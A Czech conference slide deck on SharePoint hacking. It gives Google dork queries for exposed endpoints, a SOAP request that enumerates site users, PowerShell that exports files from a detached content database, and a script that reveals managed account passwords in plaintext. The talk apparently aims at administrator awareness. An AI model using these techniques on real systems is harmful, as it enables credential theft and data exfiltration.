SHAREPOINT HACKING, ANEB JAK PŘIJÍT K SHAREPOINT DATŮM?

SHAREPOINT HACKING, ANEB JAK PŘIJÍT K SHAREPOINT DATŮM? KAMIL JUŘÍK SHAREPOINT MVP, CTO ACCELAPPS

SHAREPOINT HACKING? SharePoint zranitelnosti SharePoint Google hacking SharePoint Shodan BLOB cache SQL DB SharePoint PowerShell Data Export Site Collection Admin, Web Application Policy, Farm Admin Kdo je váš Farm Admin? Vychytané nástroje 3. stran (Simego, AxioWorks )

SHAREPOINT ZRANITELNOSTI https://www.cvedetails.com

SHAREPOINT PUBLIC SITES A GOOGLE HACKING? ANEB ZÁBAVA NA VOLNÉ VEČERY, MNOHDY VELMI ZAJÍMAVÉ ČTENÍ! "all site content" site:.com filetype:aspx "/_vti_bin/lists.asmx" filetype:asmx "/_layouts/settings.aspx" filetype:aspx "/_vti_bin/permissions.asmx" filetype:asmx SharePoint "/_vti_bin/userprofileservice.asmx" filetype:asmx atd. atd.

PŘÍKLAD: POST NA USERGROUP.ASMX POST /sites/web/_vti_bin/usergroup.asmx HTTP/1.1 POST /sites/web/_vti_bin/usergroup.asmx HTTP/1.1 Host: host [ ] <?xml version="1.0" encoding="utf-8"?> <soap:envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:body> <GetUserCollectionFromSite xmlns="http://schemas.microsoft.com/sharepoint/soap/directory/" /> </soap:body> </soap:envelope> Výsledek:

SHAREPOINT A SHODAN ANEB ZÁBAVA NA VOLNÉ VEČERY, MNOHDY VELMI ZAJÍMAVÉ ČTENÍ!

SHAREPOINT BLOB CACHE SharePoint web.config: <BlobCache location="c:\blobcache\14" path="\. (gif jpg jpeg jpe jfif bmp dib tif tiff themedbmp themedcss themed gif themedjpg themedpng ico png wdp hdp css js asf avi flv m4v mov mp3 mp4 mpeg mpg rm rmvb wma wmv ogg ogv oga webm xap)$" maxsize="10" enabled="false" />

SHAREPOINT SQL DBs Kdo má přístup k databázím v SQL? Zdaleka to není jen SQL Admin Když si vezmu nějakou Vaši SharePoint SQL Content DB, co vše mám? Kolik obsahových DBs máte? Jednu? A kde takovou DB mohu otevřít?

SHAREPOINT POWERSHELL DATA EXPORT $db = Get-SPContentDatabase -ConnectAsUnattachedDatabase -DatabaseServer SHPDB -DatabaseName "SHP_PRD_Content_RestoredCopy $site = Get-SPSite -ContentDatabase $db? {$_.Url -eq $SiteURL} $binary = $item.file.openbinary() $stream = New-Object System.IO.FileStream(($SaveLocation + $DocName), [System.IO.FileMode]::Create) $writer = New-Object System.IO.BinaryWriter($stream) $writer.write($binary) $writer.close()

SHAREPOINT A ADMIN OPRÁVNĚNÍ? Farm Admins Web Application users Site Collection Admins Site (web) permissions

SHAREPOINT A HESLA function Bindings() { return [System.Reflection.BindingFlags]::CreateInstance -bor [System.Reflection.BindingFlags]::GetField -bor [System.Reflection.BindingFlags]::Instance -bor [System.Reflection.BindingFlags]::NonPublic } function GetFieldValue([object]$o, [string]$fieldname) { $bindings = Bindings return $o.gettype().getfield($fieldname, $bindings).getvalue($o); } function ConvertTo-UnsecureString([System.Security.SecureString]$string) { $intptr = [System.IntPtr]::Zero $unmanagedstring = [System.Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocUnicode($string) $unsecurestring = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($unmanagedString) [System.Runtime.InteropServices.Marshal]::ZeroFreeGlobalAllocUnicode($unmanagedString) return $unsecurestring } Get-SPManagedAccount select UserName, @{Name="Password"; Expression={ConvertTo-UnsecureString (GetFieldValue $_ "m_password").securestringvalue}}

SHAREPOINT REPLIKACE DO SQL

DĚKUJI ZA POZORNOST PTEJTE SE, PROSÍM